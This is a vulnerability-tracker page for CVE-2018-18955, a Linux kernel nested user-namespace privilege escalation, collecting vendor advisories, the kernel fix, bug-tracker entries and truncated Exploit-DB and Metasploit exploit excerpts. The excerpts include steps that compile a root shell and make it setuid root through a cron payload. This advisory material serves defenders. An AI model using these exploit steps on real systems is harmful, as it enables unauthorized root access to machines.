CVE-2018-18955
published 2018-11-16CVE-2018-18955: In the Linux kernel 4.15.x through 4.19.x before 4.19.2, map_write() in kernel/user_namespace.c allows privilege escalation because it mishandles nested user…
PriorityP346high7CVSS 3.0
AVLACHPRLUINSUCHIHAH
EXPLOIT
EPSS
7.61%
93.8th percentile
In the Linux kernel 4.15.x through 4.19.x before 4.19.2, map_write() in kernel/user_namespace.c allows privilege escalation because it mishandles nested user namespaces with more than 5 UID or GID ranges. A user who has CAP_SYS_ADMIN in an affected user namespace can bypass access controls on resources outside the namespace, as demonstrated by reading /etc/shadow. This occurs because an ID transformation takes place properly for the namespaced-to-kernel direction but not for the kernel-to-namespaced direction.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| debian | linux | < linux 4.18.20-1 (bookworm) | linux 4.18.20-1 (bookworm) |
| linux | linux_kernel | >= 0 < 4.18.20-1 | 4.18.20-1 |
| linux | linux_kernel | >= 0 < 4.18.20-1 | 4.18.20-1 |
| linux | linux_kernel | >= 0 < 4.18.20-1 | 4.18.20-1 |
| linux | linux_kernel | >= 0 < 4.18.20-1 | 4.18.20-1 |
| linux | linux_kernel | >= 0 < 4.15.0-42.45 | 4.15.0-42.45 |
| linux | linux_kernel | >= 4.15 < 4.19.2 | 4.19.2 |
CVSS provenance
nvdv3.07.0HIGHCVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.04.4MEDIUMAV:L/AC:M/Au:N/C:P/I:P/A:P
osv7.0HIGH
vendor_debian7.0HIGH
vendor_redhat7.0HIGH
vendor_ubuntu7.0HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-c6xj-3c77-g5rg: In the Linux kernel 4
ghsa_unreviewed·2022-05-13
CVE-2018-18955 [HIGH] CWE-863 GHSA-c6xj-3c77-g5rg: In the Linux kernel 4
In the Linux kernel 4.15.x through 4.19.x before 4.19.2, map_write() in kernel/user_namespace.c allows privilege escalation because it mishandles nested user namespaces with more than 5 UID or GID ranges. A user who has CAP_SYS_ADMIN in an affected user namespace can bypass access controls on resources outside the namespace, as demonstrated by reading /etc/shadow. This occurs because an ID transformation takes place properly for the namespaced-to-kernel direction but not for the kernel-to-namespaced direction.
OSV
linux-hwe, linux-gcp vulnerabilities
osv·2018-12-04·CVSS 7.0
CVE-2018-18955 [HIGH] linux-hwe, linux-gcp vulnerabilities
linux-hwe, linux-gcp vulnerabilities
USN-3836-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04
LTS. This update provides the corresponding updates for the Linux
Hardware Enablement (HWE) kernel from Ubuntu 18.04 LTS for Ubuntu
16.04 LTS.
Jann Horn discovered that the Linux kernel mishandles mapping UID or GID
ranges inside nested user namespaces in some situations. A local attacker
could use this to bypass access controls on resources outside the
namespace. (CVE-2018-18955)
Philipp Wendler discovered that the overlayfs implementation in the Linux
kernel did not properly verify the directory contents permissions from
within a unprivileged user namespace. A local attacker could use this to
expose sensitive information (protected file names). (CVE-2018-6559)
OSV
linux, linux-gcp, linux-kvm, linux-raspi2 vulnerabilities
osv·2018-12-03·CVSS 7.0
CVE-2018-18955 [HIGH] linux, linux-gcp, linux-kvm, linux-raspi2 vulnerabilities
linux, linux-gcp, linux-kvm, linux-raspi2 vulnerabilities
Jann Horn discovered that the Linux kernel mishandles mapping UID or GID
ranges inside nested user namespaces in some situations. A local attacker
could use this to bypass access controls on resources outside the
namespace. (CVE-2018-18955)
Philipp Wendler discovered that the overlayfs implementation in the Linux
kernel did not properly verify the directory contents permissions from
within a unprivileged user namespace. A local attacker could use this to
expose sensitive information (protected file names). (CVE-2018-6559)
OSV
linux-aws vulnerabilities
osv·2018-11-30·CVSS 7.0
CVE-2018-18955 [HIGH] linux-aws vulnerabilities
linux-aws vulnerabilities
Jann Horn discovered that the Linux kernel mishandles mapping UID or GID
ranges inside nested user namespaces in some situations. A local attacker
could use this to bypass access controls on resources outside the
namespace. (CVE-2018-18955)
Philipp Wendler discovered that the overlayfs implementation in the Linux
kernel did not properly verify the directory contents permissions from
within a unprivileged user namespace. A local attacker could use this to
expose sensitive information (protected file names). (CVE-2018-6559)
OSV
CVE-2018-18955: In the Linux kernel 4
osv·2018-11-16·CVSS 7.0
CVE-2018-18955 [HIGH] CVE-2018-18955: In the Linux kernel 4
In the Linux kernel 4.15.x through 4.19.x before 4.19.2, map_write() in kernel/user_namespace.c allows privilege escalation because it mishandles nested user namespaces with more than 5 UID or GID ranges. A user who has CAP_SYS_ADMIN in an affected user namespace can bypass access controls on resources outside the namespace, as demonstrated by reading /etc/shadow. This occurs because an ID transformation takes place properly for the namespaced-to-kernel direction but not for the kernel-to-namespaced direction.
Kernel
userns: also map extents in the reverse map to kernel IDs
kernel_security·2018-11-05·CVSS 7.0
CVE-2018-18955 [HIGH] userns: also map extents in the reverse map to kernel IDs
userns: also map extents in the reverse map to kernel IDs
The current logic first clones the extent array and sorts both copies, then
maps the lower IDs of the forward mapping into the lower namespace, but
doesn't map the lower IDs of the reverse mapping.
This means that code in a nested user namespace with >5 extents will see
incorrect IDs. It also breaks some access checks, like
inode_owner_or_capable() and privileged_wrt_inode_uidgid(), so a process
can incorrectly appear to be capable relative to an inode.
To fix it, we have to make sure that the "lower_first" members of extents
in both arrays are translated; and we have to make sure that the reverse
map is sorted *after* the translation (since otherwise the translation can
break the sorting).
This is CVE-2018-18955.
Fixes: 6397fa
Ubuntu
Linux kernel (HWE) vulnerabilities
vendor_ubuntu·2018-12-04·CVSS 7.0
CVE-2018-18955 [HIGH] Linux kernel (HWE) vulnerabilities
Title: Linux kernel (HWE) vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
USN-3836-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04
LTS. This update provides the corresponding updates for the Linux
Hardware Enablement (HWE) kernel from Ubuntu 18.04 LTS for Ubuntu
16.04 LTS.
Jann Horn discovered that the Linux kernel mishandles mapping UID or GID
ranges inside nested user namespaces in some situations. A local attacker
could use this to bypass access controls on resources outside the
namespace. (CVE-2018-18955)
Philipp Wendler discovered that the overlayfs implementation in the Linux
kernel did not properly verify the directory contents permissions from
within a unprivileged user namespace. A local attacker could use this to
expose sensitive
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2018-12-03·CVSS 5.5
CVE-2018-17972 [MEDIUM] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
Jann Horn discovered that the procfs file system implementation in the
Linux kernel did not properly restrict the ability to inspect the kernel
stack of an arbitrary task. A local attacker could use this to expose
sensitive information. (CVE-2018-17972)
Jann Horn discovered that the mremap() system call in the Linux kernel did
not properly flush the TLB when completing, potentially leaving access to a
physical page after it has been released to the page allocator. A local
attacker could use this to cause a denial of service (system crash), expose
sensitive information, or possibly execute arbitrary code. (CVE-2018-18281)
It was discovered that the BPF verifier in the Linux kernel did no
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2018-12-03·CVSS 7.0
CVE-2018-18955 [HIGH] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
Jann Horn discovered that the Linux kernel mishandles mapping UID or GID
ranges inside nested user namespaces in some situations. A local attacker
could use this to bypass access controls on resources outside the
namespace. (CVE-2018-18955)
Philipp Wendler discovered that the overlayfs implementation in the Linux
kernel did not properly verify the directory contents permissions from
within a unprivileged user namespace. A local attacker could use this to
expose sensitive information (protected file names). (CVE-2018-6559)
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kerne
Ubuntu
Linux kernel (AWS) vulnerabilities
vendor_ubuntu·2018-11-30·CVSS 7.0
CVE-2018-18955 [HIGH] Linux kernel (AWS) vulnerabilities
Title: Linux kernel (AWS) vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
Jann Horn discovered that the Linux kernel mishandles mapping UID or GID
ranges inside nested user namespaces in some situations. A local attacker
could use this to bypass access controls on resources outside the
namespace. (CVE-2018-18955)
Philipp Wendler discovered that the overlayfs implementation in the Linux
kernel did not properly verify the directory contents permissions from
within a unprivileged user namespace. A local attacker could use this to
expose sensitive information (protected file names). (CVE-2018-6559)
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the
Ubuntu
Linux kernel (AWS) vulnerabilities
vendor_ubuntu·2018-11-30·CVSS 5.5
CVE-2018-17972 [MEDIUM] Linux kernel (AWS) vulnerabilities
Title: Linux kernel (AWS) vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
Jann Horn discovered that the procfs file system implementation in the
Linux kernel did not properly restrict the ability to inspect the kernel
stack of an arbitrary task. A local attacker could use this to expose
sensitive information. (CVE-2018-17972)
Jann Horn discovered that the mremap() system call in the Linux kernel did
not properly flush the TLB when completing, potentially leaving access to a
physical page after it has been released to the page allocator. A local
attacker could use this to cause a denial of service (system crash), expose
sensitive information, or possibly execute arbitrary code. (CVE-2018-18281)
It was discovered that the BPF verifier in the Linux kernel
Red Hat
kernel: Privilege escalation in map_write() in kernel/user_namespace.c
vendor_redhat·2018-11-15·CVSS 7.0
CVE-2018-18955 [HIGH] CWE-285 kernel: Privilege escalation in map_write() in kernel/user_namespace.c
kernel: Privilege escalation in map_write() in kernel/user_namespace.c
In the Linux kernel 4.15.x through 4.19.x before 4.19.2, map_write() in kernel/user_namespace.c allows privilege escalation because it mishandles nested user namespaces with more than 5 UID or GID ranges. A user who has CAP_SYS_ADMIN in an affected user namespace can bypass access controls on resources outside the namespace, as demonstrated by reading /etc/shadow. This occurs because an ID transformation takes place properly for the namespaced-to-kernel direction but not for the kernel-to-namespaced direction.
A flaw was found in the Linux kernel where map_write() in kernel/user_namespace.c allows privilege escalation as it mishandles nested user namespaces with more than 5 UID or GID ranges. An unprivileged user with
Debian
CVE-2018-18955: linux - In the Linux kernel 4.15.x through 4.19.x before 4.19.2, map_write() in kernel/u...
vendor_debian·2018·CVSS 7.0
CVE-2018-18955 [HIGH] CVE-2018-18955: linux - In the Linux kernel 4.15.x through 4.19.x before 4.19.2, map_write() in kernel/u...
In the Linux kernel 4.15.x through 4.19.x before 4.19.2, map_write() in kernel/user_namespace.c allows privilege escalation because it mishandles nested user namespaces with more than 5 UID or GID ranges. A user who has CAP_SYS_ADMIN in an affected user namespace can bypass access controls on resources outside the namespace, as demonstrated by reading /etc/shadow. This occurs because an ID transformation takes place properly for the namespaced-to-kernel direction but not for the kernel-to-namespaced direction.
Scope: local
bookworm: resolved (fixed in 4.18.20-1)
bullseye: resolved (fixed in 4.18.20-1)
forky: resolved (fixed in 4.18.20-1)
sid: resolved (fixed in 4.18.20-1)
trixie: resolved (fixed in 4.18.20-1)
No detection rules found.
Exploit-DB
Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (polkit Method)
exploitdb·2019-01-04·CVSS 7.0
CVE-2018-18955 [HIGH] Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (polkit Method)
Linux Kernel 4.15.x /dev/null 2>/dev/null
}
if ! command_exists gcc; then
echo '[-] gcc is not installed'
exit 1
fi
if ! command_exists /usr/bin/pkexec; then
echo '[-] pkexec is not installed'
exit 1
fi
if ! command_exists /usr/bin/newuidmap; then
echo '[-] newuidmap is not installed'
exit 1
fi
if ! command_exists /usr/bin/newgidmap; then
echo '[-] newgidmap is not installed'
exit 1
fi
if ! test -w .; then
echo '[-] working directory is not writable'
exit 1
fi
echo "[*] Compiling..."
if ! gcc subuid_shell.c -o subuid_shell; then
echo 'Compiling subuid_shell.c failed'
exit 1
fi
if ! gcc subshell.c -o subshell; then
echo 'Compiling gcc_subshell.c failed'
exit 1
fi
if ! gcc rootshell.c -o "${rootshell}"; then
echo 'Compiling rootshell.c failed'
exit 1
fi
echo "[*] Creating /usr/shar
Exploit-DB
Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (dbus Method)
exploitdb·2019-01-04·CVSS 7.0
CVE-2018-18955 [HIGH] Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (dbus Method)
Linux Kernel 4.15.x /dev/null 2>/dev/null
}
if ! command_exists gcc; then
echo '[-] gcc is not installed'
exit 1
fi
if ! command_exists /usr/bin/dbus-send; then
echo '[-] dbus-send is not installed'
exit 1
fi
if ! command_exists /usr/bin/newuidmap; then
echo '[-] newuidmap is not installed'
exit 1
fi
if ! command_exists /usr/bin/newgidmap; then
echo '[-] newgidmap is not installed'
exit 1
fi
if ! test -w .; then
echo '[-] working directory is not writable'
exit 1
fi
echo "[*] Compiling..."
if ! gcc subuid_shell.c -o subuid_shell; then
echo 'Compiling subuid_shell.c failed'
exit 1
fi
if ! gcc subshell.c -o subshell; then
echo 'Compiling gcc_subshell.c failed'
exit 1
fi
if ! gcc rootshell.c -o "${rootshell}"; then
echo 'Compiling rootshell.c failed'
exit 1
fi
echo "[*] Creating /us
Exploit-DB
Linux - Nested User Namespace idmap Limit Local Privilege Escalation (Metasploit)
exploitdb·2018-11-29·CVSS 7.0
CVE-2018-18955 [HIGH] Linux - Nested User Namespace idmap Limit Local Privilege Escalation (Metasploit)
Linux - Nested User Namespace idmap Limit Local Privilege Escalation (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Linux Nested User Namespace idmap Limit Local Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability in Linux kernels 4.15.0 to 4.18.18,
and 4.19.0 to 4.19.1, where broken uid/gid mappings between nested user
namespaces and kernel uid/gid mappings allow elevation to root
(CVE-2018-18955).
The target system must have unprivileged user namespaces enabled and
the newuidmap and newgidmap helpers installed (from uidmap package).
This module has been tested successfully on:
Fedora Workstation 28 kernel 4.16.3-301.fc28.x8
Exploit-DB
Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (ldpreload Method)
exploitdb·2018-11-21·CVSS 7.0
CVE-2018-18955 [HIGH] Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (ldpreload Method)
Linux Kernel 4.15.x /dev/null 2>/dev/null
}
if ! command_exists gcc; then
echo '[-] gcc is not installed'
exit 1
fi
if ! command_exists /usr/bin/newuidmap; then
echo '[-] newuidmap is not installed'
exit 1
fi
if ! command_exists /usr/bin/newgidmap; then
echo '[-] newgidmap is not installed'
exit 1
fi
if ! test -w .; then
echo '[-] working directory is not writable'
exit 1
fi
echo "[*] Compiling..."
if ! gcc subuid_shell.c -o subuid_shell; then
echo 'Compiling subuid_shell.c failed'
exit 1
fi
if ! gcc subshell.c -o subshell; then
echo 'Compiling gcc_subshell.c failed'
exit 1
fi
if ! gcc rootshell.c -o "${rootshell}"; then
echo 'Compiling rootshell.c failed'
exit 1
fi
if ! gcc libsubuid.c -fPIC -shared -o "${lib}"; then
echo 'Compiling libsubuid.c failed'
exit 1
fi
echo "[*] Adding
Exploit-DB
Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (cron Method)
exploitdb·2018-11-21·CVSS 7.0
CVE-2018-18955 [HIGH] Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (cron Method)
Linux Kernel 4.15.x /dev/null 2>/dev/null
}
if ! command_exists gcc; then
echo '[-] gcc is not installed'
exit 1
fi
if ! command_exists /usr/bin/newuidmap; then
echo '[-] newuidmap is not installed'
exit 1
fi
if ! command_exists /usr/bin/newgidmap; then
echo '[-] newgidmap is not installed'
exit 1
fi
if ! test -w .; then
echo '[-] working directory is not writable'
exit 1
fi
echo "[*] Compiling..."
if ! gcc subuid_shell.c -o subuid_shell; then
echo 'Compiling subuid_shell.c failed'
exit 1
fi
if ! gcc subshell.c -o subshell; then
echo 'Compiling gcc_subshell.c failed'
exit 1
fi
if ! gcc rootshell.c -o "${rootshell}"; then
echo 'Compiling rootshell.c failed'
exit 1
fi
echo "[*] Writing payload to ${bootstrap}..."
echo "#!/bin/sh\n/bin/chown root:root ${rootshell};/bin/chmod u+s ${r
Exploit-DB
Linux - Broken uid/gid Mapping for Nested User Namespaces
exploitdb·2018-11-16
CVE-2018-18955 Linux - Broken uid/gid Mapping for Nested User Namespaces
Linux - Broken uid/gid Mapping for Nested User Namespaces
---
commit 6397fac4915a ("userns: bump idmap limits to 340") increases the number of
possible uid/gid mappings that a namespace can have from 5 to 340. This is
implemented by switching to a different data structure if the number of mappings
exceeds 5: Instead of linear search over an unsorted array of struct
uid_gid_extent, binary search over a sorted array of struct uid_gid_extent is
used. Because ID mappings are queried in both directions (kernel ID to
namespaced ID and namespaced ID to kernel ID), two copies of the array are
created, one per direction, and they are sorted differently.
In map_write(), at first, during the loop that calls insert_extent(), the member
lower_first of each struct uid_gid_extent contains an ID in the
Metasploit
Linux Nested User Namespace idmap Limit Local Privilege Escalation
metasploit·CVSS 7.0
CVE-2018-18955 [HIGH] Linux Nested User Namespace idmap Limit Local Privilege Escalation
Linux Nested User Namespace idmap Limit Local Privilege Escalation
This module exploits a vulnerability in Linux kernels 4.15.0 to 4.18.18, and 4.19.0 to 4.19.1, where broken uid/gid mappings between nested user namespaces and kernel uid/gid mappings allow elevation to root (CVE-2018-18955). The target system must have unprivileged user namespaces enabled and the newuidmap and newgidmap helpers installed (from uidmap package). This module has been tested successfully on: Fedora Workstation 28 kernel 4.16.3-301.fc28.x86_64; Kubuntu 18.04 LTS kernel 4.15.0-20-generic (x86_64); Linux Mint 19 kernel 4.15.0-20-generic (x86_64); Ubuntu Linux 18.04.1 LTS kernel 4.15.0-20-generic (x86_64).
Bugzilla
CVE-2018-18955 kernel: Privilege escalation in map_write() in kernel/user_namespace.c [fedora-all]
bugzilla·2018-11-22·CVSS 7.0
CVE-2018-18955 [HIGH] CVE-2018-18955 kernel: Privilege escalation in map_write() in kernel/user_namespace.c [fedora-all]
CVE-2018-18955 kernel: Privilege escalation in map_write() in kernel/user_namespace.c [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multip
Bugzilla
CVE-2018-18955 kernel: Privilege escalation in map_write() in kernel/user_namespace.c
bugzilla·2018-11-19·CVSS 7.0
CVE-2018-18955 [HIGH] CVE-2018-18955 kernel: Privilege escalation in map_write() in kernel/user_namespace.c
CVE-2018-18955 kernel: Privilege escalation in map_write() in kernel/user_namespace.c
A security flaw was found in the Linux kernel where map_write() in kernel/user_namespace.c allows privilege escalation as it mishandles nested user namespaces with more than 5 UID or GID ranges. An unprivileged user with CAP_SYS_ADMIN in an affected user namespace can bypass access controls on resources outside the namespace. This is possible because a user/group id transformation takes place properly for the namespaced-to-kernel direction but not for the kernel-to-namespaced direction.
External References:
https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
https://seclists.org/oss-sec/2018/q4/150
An upstream patch:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commi
arXiv
The Ideal Versus the Real: Revisiting the History of Virtual Machines and Containers
arxiv_fulltext·2019-04-27
The Ideal Versus the Real: Revisiting the History of Virtual Machines and Containers
The Ideal Versus the Real: Revisiting the History of Virtual Machines and Containers
Allison Randal, University of Cambridge
## Abstract
The common perception in both academic literature and the industry
today is that virtual machines offer better security, while containers
offer better performance. However, a detailed review of the history of
these technologies and the current threats they face reveals a
different story. This survey covers key developments in the evolution
of virtual machines and containers from the 1950s to today, with an
emphasis on countering modern misperceptions with accurate historical
details and providing a solid foundation for ongoing research into the
future of secure isolation for multitenant infrastructures, such as
cloud and container deployments.
## Intr
http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=d2f007dbe7e4c9583eea6eb04d60001e85c6f1bdhttp://www.securityfocus.com/bid/105941https://bugs.chromium.org/p/project-zero/issues/detail?id=1712https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.18.19https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.19.2https://github.com/torvalds/linux/commit/d2f007dbe7e4c9583eea6eb04d60001e85c6f1bdhttps://security.netapp.com/advisory/ntap-20190416-0003/https://support.f5.com/csp/article/K39103040https://usn.ubuntu.com/3832-1/https://usn.ubuntu.com/3833-1/https://usn.ubuntu.com/3835-1/https://usn.ubuntu.com/3836-1/https://usn.ubuntu.com/3836-2/https://www.exploit-db.com/exploits/45886/https://www.exploit-db.com/exploits/45915/http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=d2f007dbe7e4c9583eea6eb04d60001e85c6f1bdhttp://www.securityfocus.com/bid/105941https://bugs.chromium.org/p/project-zero/issues/detail?id=1712https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.18.19https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.19.2https://github.com/torvalds/linux/commit/d2f007dbe7e4c9583eea6eb04d60001e85c6f1bdhttps://security.netapp.com/advisory/ntap-20190416-0003/https://support.f5.com/csp/article/K39103040https://usn.ubuntu.com/3832-1/https://usn.ubuntu.com/3833-1/https://usn.ubuntu.com/3835-1/https://usn.ubuntu.com/3836-1/https://usn.ubuntu.com/3836-2/https://www.exploit-db.com/exploits/45886/https://www.exploit-db.com/exploits/45915/
2018-11-16
Published